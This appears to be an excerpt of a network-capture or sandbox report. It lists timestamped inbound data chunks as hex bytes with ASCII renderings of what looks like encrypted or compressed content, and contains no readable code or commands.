2023-11-18 09:02:40 UTC	3104	IN	Data Raw: 0c 14 ee 20 4f 32 8a 65 53 2f 43 cb ce c0 54 a1 b9 a3 83 d3 da 20 98 36 50 58 57 6b d3 1f a4 7a 47 fd 6e 98 f1 b5 fb 41 d2 c9 22 7f 47 6d da 2d ed dc cc 3e 8a 52 87 9c 89 fa 36 6f 76 30 8a 7d 74 2c b1 fc dc a3 70 cb f5 03 8e e2 11 fd 53 9f 60 2e 0d aa 77 df 20 98 4b 3f 30 a0 d6 ef d3 b5 b9 b3 ad d1 62 19 5c ea c4 33 dc 8e cf 47 5c ee 53 d7 cf d9 ec 95 a5 1a 96 db dc 59 5c 0f 15 b4 16 9e fd ee a3 76 67 0d 26 cc 75 b7 f7 0f db 43 b9 73 c5 a3 4b 1a de 4b d8 e3 65 3c 60 eb 65 7e 99 39 9e f2 1a 56 97 e0 3b b7 b4 44 3f 00 95 54 ae f3 92 99 13 2c 0a 4b 9e bb 8d 39 c2 e6 d3 11 91 c1 8f 08 47 e4 15 ea 87 c7 65 b3 82 bd e5 73 c1 47 8d 19 96 07 97 60 5a 30 82 17 1e c1 83 2b 97 b6 85 a5 bb 8c 06 5c cc 31 7b cd 42 30 e0 f2 39 a4 8b fe c8 c3 b2 c2 72 ca a6 ab 72 78 9a Data Ascii: O2eS/CT 6PXWkzGnA"Gm->R6ov0}t,pS`.w K?0b\3G\SY\vg&uCsKKe<`e~9V;D?T,K9GesG`Z0+\1{B09rrx
2023-11-18 09:02:40 UTC	3120	IN	Data Raw: 18 1f 3c 04 b1 9e 3c e7 d0 f5 b6 61 2d a6 ad 3f 02 24 7d 61 8c 87 a2 c9 af 74 c5 1c 84 a3 0f c2 f9 a0 c5 e6 9f d4 26 7e 03 4e 41 77 63 66 7a 5b ba d2 ea 2b c7 cc 8c 01 ba fb 7d f0 f3 3c eb 52 89 c4 88 98 6a 70 8f c2 3b 99 59 90 2d 33 37 94 5b dd c5 6e 22 fa a0 b9 66 0f 01 66 77 9e dd 16 b7 0e 8f fb b9 d5 9f ba 39 68 ac 27 1c ea e7 e9 94 a2 85 f2 72 07 de 05 55 1c 83 ed e1 ea 23 e0 52 ae 36 f4 d0 96 23 ba 54 2d 26 4f 8f cf 42 b9 29 90 2c e6 70 83 45 3b cb b5 29 2f 55 4c a9 91 3d 4b ef c5 e8 84 79 37 cd 10 f4 7b 3b 60 07 cd da c1 9d 61 bb bf a8 08 ee 7f 58 8b 59 ff 9e b6 71 e3 17 87 f4 e8 af a8 54 a1 6b 73 bd 99 71 5c ae 53 66 ee d5 41 99 73 16 87 74 a9 17 6a 5b 48 7e 1f 1b 50 a1 f8 8f 78 2e a9 4d b4 61 ec cf 85 8f be 14 42 27 2d 93 ea 8d 5e cb 6c 72 63 ba Data Ascii: <<a-?$}at&~NAwcfz[+}<Rjp;Y-37[n"ffw9h'rU#R6#T-&OB),pE;)/UL=Ky7{;`aXYqTksq\SfAstj[H~Px.MaB'-^lrc
2023-11-18 09:02:40 UTC	3136	IN	Data Raw: b1 64 1f ef 64 92 05 62 ea 7c b4 e6 c0 ef a3 8b 10 e2 f6 b0 ac b3 ec d9 ef 2c 34 1e 7e 2a 06 8d 51 da 1e 0e 08 24 2a 7b 02 54 49 b2 d7 ad ef 5d 3b a7 01 a1 17 29 81 c9 39 f3 62 db 47 e6 5c 13 d6 22 57 11 e9 40 a4 6f e1 77 9a 26 92 37 e6 29 43 04 88 d1 85 01 20 94 6c 82 03 ac 9c 44 01 dd 21 cd aa 43 69 df 29 66 43 05 13 3a a0 62 34 e2 99 ab 30 59 69 c4 63 57 61 8a d2 b8 49 13 93 a0 ea b0 a5 75 f4 df 21 93 b7 50 83 c9 85 e8 08 fd d7 42 ff b5 d2 7f ed 43 40 99 31 98 b3 1e 41 55 29 ee cf 44 86 0c c6 59 e0 38 f0 f4 45 11 39 e8 71 ec 00 1e c7 1a d7 e3 6d 3c ba 0d a7 a1 e6 5b c1 cf 84 ba ee 46 6f 3c 63 e6 9a f9 ea da 19 94 af f2 d9 b0 95 30 be 5a 33 87 f0 d5 c7 59 90 d2 14 3a c8 f9 e4 52 7a 40 85 8c cd 47 66 40 86 67 2d d8 26 97 a5 92 cb d0 1f b0 15 65 53 e1 fa Data Ascii: ddb\|,4~Q${TI];)9bG\"W@ow&7)C lD!Ci)fC:b40YicWaIu!PBC@1AU)DY8E9qm<[Fo<c0Z3Y:Rz@Gf@g-&eS
2023-11-18 09:02:40 UTC	3152	IN	Data Raw: f0 03 17 00 97 09 37 c8 f8 13 77 10 0c d5 e7 0a a3 bd 22 0d ef d9 83 2b 5f 8a 06 03 48 7b e7 1a 12 40 48 eb e2 e1 4b cb 08 65 db 75 1e c4 fe f5 04 45 88 48 24 ff 95 6f e6 c3 be 74 a2 bd 27 1e 5d 0f 25 71 21 c3 e6 1f 4a ee dc 12 89 19 f6 6d 60 56 ec 49 1c 1f 12 92 43 45 fb 18 45 47 42 d1 f6 a4 51 d0 2e b2 bb 27 85 dd 85 96 66 9e d4 d5 ab 06 f4 4a 92 82 2e f3 14 bb 5b 03 7f 34 08 90 dd f5 ca 02 b5 7e b1 62 77 6b 65 91 79 ff a8 b1 03 58 14 e4 ea 4c 16 98 4a 14 18 f3 62 d9 e1 95 a3 60 79 18 b9 59 b5 58 95 9b 65 24 37 89 b3 39 1f 5e 22 56 f9 16 32 b9 c9 5a 0c 72 b3 5c 44 b1 80 18 67 e6 b9 28 14 ab 15 8e af c6 c1 b9 2b eb bf 64 fe 29 99 0d 33 0a db 12 1f 0f 52 8f 08 50 4c bc b4 c9 3b ff 35 b8 26 31 bd 17 24 a9 23 0e 86 62 3c d4 85 61 6c c4 f4 06 77 3a d6 3b d0 Data Ascii: 7w"+_H{@HKeuEH$ot']%q!Jm`VICEEGBQ.'fJ.[4~bwkeyXLJb`yYXe$79^"V2Zr\Dg(+d)3RPL;5&1$#b<alw:;
2023-11-18 09:02:40 UTC	3168	IN	Data Raw: e6 e2 83 a2 82 e0 9c 1c 7f 0e 2a 70 77 c3 1c 81 52 b6 df 48 14 db 07 ca 27 e6 9e 52 e8 24 db 5d 20 e3 0f ef ed 56 38 42 cf 9c 46 35 e2 72 db 68 d0 78 e8 5f 71 98 11 3b 3c ff ba c5 13 75 3d cc 33 64 c0 56 24 09 37 bb 14 c2 ff 4a 8f 2d df 70 da 6f 94 e1 46 03 1e ff cb 37 9c 27 33 9d 52 ad 12 cf c5 d0 f7 72 df 79 a5 2e a5 c0 bc ab b4 df a4 5a b2 c7 41 59 3f 91 7c fa 05 cc 94 51 1c ad ed 5e 39 6c db ca ff d1 d9 63 2f fc 33 42 4b 38 fe 9d 82 e7 fd df 85 ab f9 27 e0 aa 0c cf 3e fb ed 8d 7b 5c 96 03 c6 2f db 79 87 c7 78 49 15 17 90 2a b6 7e 27 9b e3 97 56 91 17 e0 62 0d 21 aa 8d 72 fc 3f 65 4f 1f 17 65 95 f5 0c 0e 81 cb e8 50 b2 e6 1a 16 99 16 ae 59 ba 66 1f 7e bc d2 9b 93 bd 96 65 fd 60 33 53 53 f3 2d b6 a8 cc 66 14 4d 74 08 30 68 40 29 a5 a8 ac c5 b2 1c 15 75 Data Ascii: pwRH'R$] V8BF5rhx_q;<u=3dV$7J-poF7'3Rry.ZAY?\|Q^9lc/3BK8'>{\/yxI~'Vb!r?eOePYf~e`3SS-fMt0h@)u
2023-11-18 09:02:40 UTC	3184	IN	Data Raw: ce 85 56 4e 11 24 0d ac 32 93 34 2f 8c a4 01 4e d2 e5 40 92 77 15 9e e0 a1 6a 12 a3 bc bc af b1 9a f2 e0 68 8f bf 04 62 96 ef 44 9f 0e 37 80 41 f0 4b d9 6e b8 96 e1 5a 1e 46 9f 46 6d 9e ae 12 31 c3 db f2 3c 43 59 0f 65 12 31 cb 72 e0 c8 49 1b 55 48 0d ab 90 9a 0c a6 03 6a 68 4a b1 95 0f 51 7d 45 b4 d9 de 33 75 d4 88 c5 c6 24 a7 da f0 94 95 0f 74 7d 29 de 25 1b 4f 5a 8c 0a 20 f6 1a 36 24 d9 2c 81 17 86 d1 9d e5 7a 52 31 d4 e2 7c a2 61 3e a6 02 91 58 b5 5d b1 f2 0c 33 91 b8 65 73 84 26 77 cc 3a 3b 31 c0 49 c4 8a 6a ee 71 d6 62 1f ec e4 91 ac 96 6a 45 2d a1 df 74 2f 3e 65 6f dd d6 24 9b 45 f7 d6 dd 83 c9 c4 9e 5a c6 9e da 0c 67 73 f9 8b 7c ae 8f be 1c e9 a7 a7 b3 a1 63 6e 11 2e be 8b 48 90 2a c0 6f c4 bc 6c 21 48 92 04 b5 73 7f d2 41 cd 24 41 75 ba 04 f5 f1 Data Ascii: VN$24/N@wjhbD7AKnZFFm1<CYe1rIUHjhJQ}E3u$t})%OZ 6$,zR1\|a>X]3es&w:;1IjqbjE-t/>eo$EZgs\|cn.H*ol!HsA$Au
2023-11-18 09:02:40 UTC	3200	IN	Data Raw: c0 8a 75 bc a2 e0 08 e6 79 26 08 6d 17 e7 99 00 4e 29 55 8d b0 7b a5 a2 46 08 e0 fa 52 25 e4 9f c7 29 12 32 9a 24 55 e1 34 f3 ef 20 9c 82 2c 33 63 96 b8 c4 d9 13 7d db 2d 5e e2 5c 8b 97 38 d7 a8 9a b6 26 6e d5 d9 87 86 b9 e8 fd 3a f3 59 eb 7e 5d cb 69 99 34 b4 07 65 31 a4 fd fa 8f 01 b6 5f 27 3f db 8a a0 62 ee fc 3d 6d 90 3e b4 41 3a 45 90 ee 01 48 ef 57 d2 c8 c7 82 54 57 69 85 f4 89 0d d2 57 04 29 0e 20 e5 57 b6 52 f7 e8 30 7d 66 06 6c 5d cd 92 41 c3 20 65 b8 94 bb 69 97 5c 46 b1 4c 41 70 ee 65 22 6c 46 bc 38 13 64 35 ab 8a 85 76 9a 57 39 3d ba 77 21 df fa a8 44 9f 55 83 de 66 3c 20 18 ae df 67 cb dd 9f 55 2f d5 ae 87 60 d4 9b bc 45 4d 5a c1 8d fc ba 5b c4 92 f6 ed 8f 63 99 c4 b0 44 ee c4 0d 08 04 1d f8 31 38 92 f0 ee 6d df 42 ca cd 5f 7e 07 3b 2f c2 9a Data Ascii: uy&mN)U{FR%)2$U4 ,3c}-^\8&n:Y~]i4e1_'?b=m>A:EHWTWiW) WR0}fl]A ei\FLApe"lF8d5vW9=w!DUf< gU/`EMZ[cD18mB_~;/
2023-11-18 09:02:40 UTC	3216	IN	Data Raw: 06 f0 59 36 28 cf 88 44 7f f8 21 40 97 12 47 9a e7 6e 91 e8 aa 08 55 0e 02 7e e4 5d 4e 0f 64 c2 e3 f8 70 d4 c0 03 e3 bb 59 be 86 96 87 e3 3f 67 72 89 5d e4 75 b9 a5 9f 73 ba 9c 86 d0 49 a3 b9 fb 9e ea 76 61 79 91 c1 7e e1 84 1b 8e 45 44 71 4f ce 29 94 8c cf c9 61 1c 18 21 9b 22 10 f2 9d 0f 61 09 14 65 19 6a cb bf cb 24 08 5d 52 f6 cb f3 c6 94 f5 b1 16 fe c5 28 7b 43 1b a1 ec ab e7 39 d0 28 69 e5 6d 4b fb 17 38 0f e5 4f 20 9a d5 28 83 7a 1d 8a 9d bf 1d fc 5e 62 79 de f1 71 bd 47 55 5b 0e 74 a3 9f 0d f5 7e 49 af 44 31 50 bf d7 42 1e fd 0b 21 af ac f7 2b 01 f6 ed 3e 38 04 ce b0 07 6d c5 43 40 ad d1 8a ee db 46 19 85 1b 43 f7 1b d6 ce 95 08 ed 98 d5 76 da 3b d4 70 8d ed c7 d8 58 dc 94 bc 16 7b c4 94 af 78 5a 35 0a 77 22 57 68 ae fa 5b ba 2e 92 c6 8a bc 69 35 Data Ascii: Y6(D!@GnU~]NdpY?gr]usIvay~EDqO)a!"aej$]R({C9(imK8O (z^byqGU[t~ID1PB!+>8mC@FCv;pX{xZ5w"Wh[.i5
2023-11-18 09:02:40 UTC	3232	IN	Data Raw: 26 c3 3d e3 f0 12 3c b3 9c 41 fe bf 63 06 9d 61 16 5b a4 bb 8c b4 71 a0 d2 d9 aa e3 cd b3 19 9b 6a 53 6e ae 73 57 b5 0b 2e 74 d3 ad 94 f7 8f 7e a3 a9 b8 8c a1 37 f5 f6 58 d4 1e e5 4d 35 61 53 41 c5 4b 5c 73 7e bb 60 6d 37 dd 4a 79 f7 2a 4d 25 0d a3 a9 3b b0 a9 20 77 5d d4 ea ae 7f da 1e ea ef 26 c1 5f 1b 3c 03 d2 20 e3 83 c7 a6 51 e2 ad 04 74 04 7d e5 d9 6b e0 4d 15 12 05 e0 3a 1a 12 85 a6 69 3d f5 a8 71 df 58 63 25 f9 4a c3 80 2a 4d 09 15 dc 00 cc 7f 13 88 ff dc cd 03 42 52 d0 22 53 3e 99 f2 cb 54 ab 4c b5 c9 54 50 a6 42 32 d5 2d 53 3d 32 75 4a a6 fa 64 aa 5f a6 2c 52 56 61 93 29 bb 4c 39 64 ca 29 53 49 94 0a d5 6c d5 59 47 d2 d8 cf d0 d6 eb a1 4f 29 90 9c de c0 16 a4 7b 06 38 ee c3 ee 89 3b c8 a5 6c 92 3c 98 0f d3 77 dd df d9 26 ec 6e 51 ca f7 5c a3 96 Data Ascii: &=<Aca[qjSnsW.t~7XM5aSAK\s~`m7JyM%; w]&_< Qt}kM:i=qXc%JMBR"S>TLTPB2-S=2uJd_,RVa)L9d)SIlYGO){8;l<w&nQ\
2023-11-18 09:02:40 UTC	3248	IN	Data Raw: f7 4a 12 32 b5 2a 08 2d 5c 8b 27 9f c1 6b 0e 71 d6 3d 3b 62 cd 5a d1 56 94 1d 45 81 7c bb fe b3 eb 00 7f 8b 42 be 5f e5 a1 91 56 9e d5 73 21 17 55 52 43 87 38 d8 70 9c f9 7b 79 99 91 f9 7b 91 be 0d e0 61 c1 8f a8 9f fd 10 4f b2 a5 55 f0 12 08 f3 88 55 fa 59 36 79 95 7e 96 75 fe b0 97 f7 fc cb 73 dc 71 82 60 d1 0f d8 01 17 9f f7 8d 6a 32 ea bf 66 99 70 ae 51 a8 e2 44 fa 9c 6e ad ef d9 a2 27 66 8d c3 45 b5 17 bf 89 ee 1e 97 9f 31 1c 23 93 a9 93 96 0d 86 28 72 f5 d7 5d dc cb 86 c8 19 3e 31 00 fd cc 73 61 96 df 9b 4c 20 0d dd bf 03 5c 48 fc a6 17 0d 56 07 73 80 75 0f c5 bc df 3a 4f 7d e7 03 d1 bd af 26 3c 10 dd fb ea 58 43 4c 4b 1f f8 fc 6b 48 57 03 9d 8a c0 79 f3 fc df 35 7e 63 0c ce 94 d7 10 9b 5b b0 99 b9 85 3b 62 7c a0 d8 3e 51 d5 88 5f 5d d6 10 4b 5e 78 Data Ascii: J2*-\'kq=;bZVE\|B_Vs!URC8p{y{aOUUY6y~usq`j2fpQDn'fE1#(r]>1saL \HVsu:O}&<XCLKkHWy5~c[;b\|>Q_]K^x
2023-11-18 09:02:40 UTC	3264	IN	Data Raw: 6e c5 9b ea 75 ae 6e 66 90 ba f9 df 22 ff c7 87 6c 75 5e be 3b a4 8b 9a 08 9b 3f 09 51 dd 6e 12 64 d4 26 92 3d 86 1e 80 b7 cd 33 f7 84 b0 0c 43 7b e4 56 7e a6 b7 a7 ea 03 37 88 72 7f 66 16 e8 98 0d 5e c7 32 37 ff 5a ef 75 2c 3f 50 1e 1d 79 e7 3b 59 ba c6 2d 6f e3 d9 c2 22 38 54 f7 91 cc a1 c1 c4 a1 85 c4 a1 1c e2 50 6c 03 e3 50 16 38 65 d1 d5 63 23 82 2c c0 e8 3e b1 dc cd fa 59 be 18 8b 89 3e e5 6c 02 88 d4 18 05 a9 8b 09 29 7f 99 5c ab 2e bd 9e 21 15 de e5 74 b8 0b ef b2 1f 7d 01 a6 88 c0 5c 01 60 ca 59 63 47 2e 2d db 65 cf 25 01 e9 55 82 14 da c9 20 dd bf cb c6 a8 30 31 ce 08 a5 98 dc 65 aa d9 13 68 a2 8d c6 9f 8d f4 20 97 8a 8e 47 ee 0a 19 66 df 95 64 17 8c 31 e7 e7 b5 ff e8 c0 ae 40 36 33 10 7b 4b f2 90 07 3a 94 e5 70 4e df 53 b9 a7 34 92 20 06 6c 58 Data Ascii: nunf"lu^;?Qnd&=3C{V~7rf^27Zu,?Py;Y-o"8TPlP8ec#,>Y>l)\.!t}\`YcG.-e%U 01eh Gfd1@63{K:pNS4 lX
2023-11-18 09:02:40 UTC	3280	IN	Data Raw: c0 7f 64 8b 70 b7 12 71 8c 66 db 43 89 1e 09 23 df 06 9a 72 0f 60 b0 fb 40 d3 ab 6e ee 62 d0 33 a7 a3 9b 65 65 db b7 38 ab 0a d8 ac 72 60 0a ee ad 98 dc 3a ef 4b 1c 0c 04 72 91 01 81 a0 16 f5 18 d4 22 a7 3d 08 86 98 58 78 01 9f 79 62 b5 49 33 3d d2 3a d4 2d 0a 50 68 cd 57 20 7c 9d e4 91 72 3a fa 3d fb 1c 7d 7f 61 8e 47 82 fc d3 0e cc 3f ed c4 fc d3 2e cc 3f dd 8e 06 7e 0f 1b 60 d4 0c e7 53 83 09 c9 bc 81 1d 1b 54 62 83 6a 6c 50 83 09 ab 6b 31 61 75 1d 26 ac ae c7 84 d5 8d 6c 72 18 78 14 6b 26 0c 92 be 83 62 e1 6e b6 c6 77 4f 37 17 99 0a 8e c3 cb 4f de 61 cb 20 e8 90 26 1c 63 2e 20 2e 5e f9 b5 24 cc 9a df 16 38 e1 ac 1a 6c 2a 65 fa 43 a9 bd 4a 15 35 70 d7 42 28 e2 33 c2 21 8c 68 90 8e 9e e2 72 b3 51 75 ca 51 dd b0 59 58 8d b6 99 5e 60 a4 03 d0 ec 03 85 a2 Data Ascii: dpqfC#r`@nb3ee8r`:Kr"=XxybI3=:-PhW \|r:=}aG?.?~`STbjlPk1au&lrxk&bnwO7Oa &c. .^$8l*eCJ5pB(3!hrQuQYX^`
2023-11-18 09:02:40 UTC	3296	IN	Data Raw: 7f 4b 3f 7d 4e 66 af bc 3f 81 8b 1b 21 a6 bc 25 33 ef 0b 60 93 58 33 4e e1 73 ed 1a 73 20 84 1a e1 10 28 de fc 75 48 7d ce de 22 aa a2 e4 1a 55 16 99 85 d4 b6 7c 7d 5e 76 77 ad 00 f9 df df b6 0f a9 51 b0 d9 0c 79 27 41 86 7b 75 c8 29 12 e4 1f 6e 12 b2 9a 20 e3 0d c8 4b bd 44 c8 79 bf 35 05 53 88 33 1d 63 7a ad b4 8d 12 fd 88 c7 ab cb 68 63 5b 10 1f be 5e b1 de 7b c1 eb 3c 54 00 01 4a 0a eb fd 8b dc 79 d9 ae 9e 6b fe f1 1b 85 1e 2f d0 1e 97 1c 29 a9 2d ac f7 d3 fe 95 7c e4 3c b4 95 15 6d 0b ad 2e c6 4b d7 c8 68 58 4a e8 19 55 bf 86 bf 14 ad bd 14 18 0e 5a 21 57 1b ef 99 6c bc c7 26 05 28 64 62 e2 e1 19 e3 50 34 86 47 12 33 05 af 9e 67 9a 06 09 e2 fa 40 29 98 80 71 fa 31 78 2b 89 e1 99 f4 f7 32 9a f0 77 3e fc 8e 36 7e 7f ac 59 fe 7b a1 a1 ea bb da 13 a1 8a Data Ascii: K?}Nf?!%3`X3Nss (uH}"U\|}^vwQy'A{u)n KDy5S3czhc[^{<TJyk/)-\|<m.KhXJUZ!Wl&(dbP4G3g@)q1x+2w>6~Y{
2023-11-18 09:02:40 UTC	3312	IN	Data Raw: f2 ee c1 43 26 fc 18 18 25 a6 10 55 da 4e 2e 6c 14 f9 75 86 66 2b 4a 7d 6f 39 61 4d 48 5e 45 bd 5b a3 c8 ab 28 6d 76 a9 f8 ee ee 8c e1 df 7f 62 ce 20 71 c3 78 73 1b a8 b9 bf 5b c5 3a 75 fd 27 fa 1d bd 30 11 fb a9 01 ad a0 97 1e ed 07 42 fb df 95 0c 6d a2 40 b3 45 40 1b 67 40 3b 6c 40 fb 91 d0 3e 06 b4 5f 21 9a 5f 1e a2 f9 b3 21 1e 22 a1 b7 b8 ee 3c 5e 1c 04 24 ee a4 38 e1 4e 88 c9 d5 fa 9e e2 de 5b 4e e3 5b 9b c6 89 b7 60 87 8d 36 c5 5a f3 53 68 b4 d3 67 f8 c1 51 98 50 a8 ca 6e 53 5f 0a c1 8a 55 ff 52 bf 5b 61 81 dd f7 0c d3 a4 49 0d 49 93 a9 c3 22 7b d0 55 cd 35 2c 5b 2b aa a9 ff cd 1c f1 d5 e0 a6 1d 39 68 14 3f 8f e6 6b e9 40 01 ea d0 c4 9e 78 c1 fb 03 62 2d eb a4 cc 08 39 bf b0 f5 42 80 eb 3e 46 0e d0 86 d1 ea 6c f3 61 34 a0 37 ef bb 45 d4 a8 07 a2 79 Data Ascii: C&%UN.luf+J}o9aMH^E[(mvb qxs[:u'0Bm@E@g@;l@>_!_!"<^$8N[N[`6ZShgQPnS_UR[aII"{U5,[+9h?k@xb-9B>Fla47Ey
2023-11-18 09:02:40 UTC	3328	IN	Data Raw: 18 08 ec ce 99 7b 62 08 c4 78 4f 17 33 77 b7 ee 49 7b 06 22 bb 48 2d f4 21 df ba c7 ed b2 37 23 68 ae 28 51 ef 86 22 87 b5 12 7d ae 3c 37 7d 58 6e dd d3 2f e7 79 58 7d 33 df ec 57 a9 41 c4 54 d9 de cc 22 d8 d8 a8 e4 32 c5 55 60 8c 8c 5f f5 64 54 1a 50 fb 9f cf c0 18 d8 23 da 0f 34 7f 19 a7 db 0f a0 ad 64 8f c6 7c 9c b7 01 8b c8 0e 0b 1c 13 79 46 a0 2f de 9b f9 00 f9 11 6c 62 f3 c0 cb 0a e9 d6 e8 55 fa f9 60 87 89 da 6c 39 56 b0 77 d6 3d 2d b0 21 85 7d 10 d3 10 66 2a cd 09 e8 af 7f fe 39 40 74 47 18 f0 b5 11 80 27 20 b0 83 2d 57 f3 d1 68 75 7a 58 c9 51 11 4a f6 cc 13 4b 86 db e4 e6 dd 2a 48 6f 32 93 c4 b3 9c ab 65 55 14 03 a0 3a 2a 75 c3 43 ff 4f 52 bb 54 eb 1e 69 d7 2a 1c 2e b5 f4 0d aa e4 de a6 bf e9 a3 b6 ca f1 e0 8f 42 2f 5a 48 17 ed f1 a1 2f b1 f4 f2 Data Ascii: {bxO3wI{"H-!7#h(Q"}<7}Xn/yX}3WAT"2U`_dTP#4d\|yF/lbU`l9Vw=-!}f9@tG' -WhuzXQJKHo2eU:uCORTi.B/ZH/
2023-11-18 09:02:40 UTC	3344	IN	Data Raw: 73 8f b1 29 f9 16 90 af 43 95 ef e4 18 93 89 24 5f 4c 85 6c bf 1d 7a 6d b9 dc 6b c7 ad 6a ed 82 89 c2 8c 1d 21 9b 69 84 78 6c f4 f4 13 8f 3f 7b ba 03 13 31 ea d9 d7 a1 36 18 a1 0c 15 c3 d7 66 35 ff cf de 79 ec 91 db 31 6a 7d fb be 00 26 ce ca c9 6a 4d 90 48 6e 1b be fa a9 a0 fe ef c8 8d d2 ff bb a8 53 d5 5c 5e a0 62 2d c5 6c 43 0b 2a 4b ed 88 48 fe d6 36 da cf 16 d7 80 51 75 c4 d8 a8 8a 5f a9 e5 c1 c8 a8 0a c5 ab 3c 54 0b a1 f9 a0 a7 32 b9 dd 20 bd d9 bc d9 aa e8 32 05 0f b2 b1 bb 79 08 1a bb d3 e1 33 c9 d8 3d 22 8c dd 0a 9d b1 8b 96 63 d7 b3 e1 30 2e fe 12 d4 95 25 d6 74 a4 5d 69 8d d0 7d b8 32 1d ab 21 2c 34 af 6f 65 54 41 63 21 6d e2 eb f8 f2 4d 33 45 5d 58 f1 c7 6d c6 46 a5 83 b1 11 7e da 97 73 da ec b5 1d 72 9f b6 b3 27 9b 77 25 63 37 66 79 2c f9 6e Data Ascii: s)C$_Llzmkj!ixl?{16f5y1j}&jMHnS\^b-lC*KH6Qu_<T2 2y3="c0.%t]i}2!,4oeTAc!mM3E]XmF~sr'w%c7fy,n
2023-11-18 09:02:40 UTC	3360	IN	Data Raw: 1f a4 29 bf 36 b5 0d 0d 55 56 81 d7 b8 15 9f 6e 0c 37 fd 6e 92 22 8b ab b5 e1 d7 89 8c 1d 5f ad a1 b3 af 21 97 76 ad 64 95 37 95 c4 71 bb 5b be 65 70 47 87 e7 98 2a 86 db a7 dd 26 47 4f 7b 28 39 ca e1 29 d1 84 ef c9 f5 6c 7f 4d ce 24 23 2f 3e 38 01 ea 8e 2c ba d3 35 7c 70 3a b2 ee d4 4d 08 9e 3a 89 83 33 8a 28 96 9e 62 94 10 96 0c d4 06 a9 ef 21 13 54 8b 41 fa e4 55 4d 32 ef b8 42 d6 62 1d 44 ab 08 0f 7d ee 57 21 88 69 59 c1 1d 05 4d 66 89 7c c6 d1 68 53 d8 0f 9c ba 7e dc ff 4a f4 cb 36 9a f2 ef 1e 07 fc 7c d2 e7 ac 36 32 22 ca 58 4f a5 04 78 d4 56 59 72 e4 ff 1f 77 01 b8 14 70 37 47 b9 c6 ba 9b 3b 3b 3c 85 5a 00 80 01 ba 1e cf a2 1e f7 38 1a f9 d4 57 3a 53 f8 02 9c 88 56 81 fc 3c 40 03 52 60 06 62 c1 e9 99 33 65 85 fa 91 1c 22 6b 2d ca 20 a7 3a 26 14 b7 Data Ascii: )6UVn7n"_!vd7q[epG*&GO{(9)lM$#/>8,5\|p:M:3(b!TAUM2BbD}W!iYMf\|hS~J6\|62"XOxVYrwp7G;;<Z8W:SV<@R`b3e"k- :&
2023-11-18 09:02:40 UTC	3376	IN	Data Raw: 71 10 d0 85 3f c4 37 99 a6 49 7d f1 b4 bf 89 92 57 08 43 7b a4 8c a8 78 13 51 11 1e 4e 2f d3 15 fc 60 a6 52 c1 86 9b ac 67 22 e9 7c cc d1 a3 a7 50 9d cb 8e 9e 12 11 58 9f 1b 03 fd 3c cf 1d 07 b9 51 44 f9 7c 88 7d 01 60 0b b3 d9 c8 9e 28 3c 1a d7 e6 54 43 18 49 22 87 01 b0 92 d9 b1 24 0d cf dd 68 e9 d9 af 9d fc d1 1f b4 fa a3 1f ff c0 1d 7a 94 19 17 cc fb b8 f1 75 0d 59 a5 d5 21 9b 34 b1 c9 5d 0d cc 3d be c6 4a c3 9a 3a 7d 76 60 a0 6b 7e 2c 51 88 4f e7 e2 cc c4 78 7a ef 39 7c ca 2c b6 73 b6 f4 ad 94 df 68 b9 f5 15 25 5b 5f 11 b2 f5 d5 ce af 96 61 43 33 6d c7 9b b4 e7 1d 24 ab 92 68 d7 3c 7d 33 e5 fc 25 18 94 83 9d 9e 76 b3 e0 4f 6e b0 bc 20 10 95 ff 73 03 6e 43 16 88 02 45 79 18 23 38 1d 07 4d 13 05 0b 3a 9d 70 22 ce 7a 68 b3 84 25 37 48 dd 40 5a 45 33 4b Data Ascii: q?7I}WC{xQN/`Rg"\|PX<QD\|}`(<TCI"$hzuY!4]=J:}v`k~,QOxz9\|,sh%[_aC3m$h<}3%vOn snCEy#8M:p"zh%7H@ZE3K
2023-11-18 09:02:40 UTC	3392	IN	Data Raw: 25 2d 49 b8 b4 93 15 0d e2 84 4e 96 5f 18 06 77 32 f5 ce ec 90 de 99 1d f2 3b 33 99 8c 94 a5 46 ef cc 27 5c 66 df 99 b5 77 24 2c 75 49 df 8d fa b6 d0 5b 4c 87 e3 e4 b7 85 1b 64 88 b5 5f 18 b2 a4 b9 2e b3 a9 fe 58 45 aa ef a2 29 be 68 a9 ef 72 1e 55 7a bc a3 51 1a 1f c7 a4 f1 71 ea 34 7e 51 c7 66 53 a5 c5 26 ae 06 22 ce 6a f6 cf fc 4c 27 04 ce 6a 22 a8 b6 83 fb 91 b3 7a e0 e7 a0 74 4b 0f 8a 9c f4 76 a0 b5 36 08 9a 6d 56 33 59 2d a1 4f df 38 4e 2e e8 41 f1 b3 d6 ae 07 a1 bd 01 84 22 80 f0 7b 0c e1 fb 83 90 f6 39 b8 74 6d c1 17 32 5d fb a2 19 ba 96 20 78 f7 20 3f c7 a2 08 a6 03 82 03 3f 21 04 f9 07 45 8f 3d 42 ba 1a a8 55 14 e2 96 b4 df fb 20 3f 22 d0 f6 e7 42 fb e3 70 fb b5 07 34 c4 ed ff b5 6f 32 71 8b 12 0e 34 53 e2 dd e2 44 62 36 3a 2c 9f 7f 58 85 73 9c Data Ascii: %-IN_w2;3F'\fw$,uI[Ld_.XE)hrUzQq4~QfS&"jL'j"ztKv6mV3Y-O8N.A"{9tm2] x ??!E=BU ?"Bp4o2q4SDb6:,Xs
2023-11-18 09:02:40 UTC	3408	IN	Data Raw: 95 e1 7b b9 11 eb 27 c5 b0 fa b9 3d 34 1a 8d 3a 65 8d ac 17 12 50 ca 20 d1 68 ee 54 7a 19 44 c0 f6 ca 1d ec 1c 6d b5 18 0c e5 94 b3 2b c3 8b 01 a7 6c 41 ca 57 10 ca fe 26 2a c8 8a 33 65 cb 3b c2 ae 84 b0 2a 49 95 e1 ad 0a 27 d2 06 89 6c d8 17 ac f1 5f 90 dd 13 c1 d0 9f fc 0e 9c 89 3a 13 38 14 a0 78 f9 9c 84 30 62 a7 42 fb 2d 78 d3 35 e8 ab fc 00 80 75 56 0d 75 69 78 09 9b 8f c3 dc a0 46 d4 b5 d7 7f aa 5e a2 d5 08 74 1d 3b 52 a5 de 56 d0 f6 a2 46 a0 77 5a 15 fb fb 28 95 98 32 51 56 ca e4 29 4b 19 75 9d 7e 0b 04 7c bd 3d 80 8f 95 b9 86 c5 c1 7d 86 01 d6 4a 12 02 16 28 58 f4 88 19 3f 0b 57 ab a3 c1 43 b2 54 f1 7c b4 e5 0e 0f ab 7a 19 4c 43 60 fe 61 2f a4 f3 69 6b 61 96 87 39 eb f2 6c 79 df 31 79 1a 62 5b 08 7e de 9a 81 c7 69 48 87 e4 6c ee 9a 93 2c fc 6a 9b Data Ascii: {'=4:eP 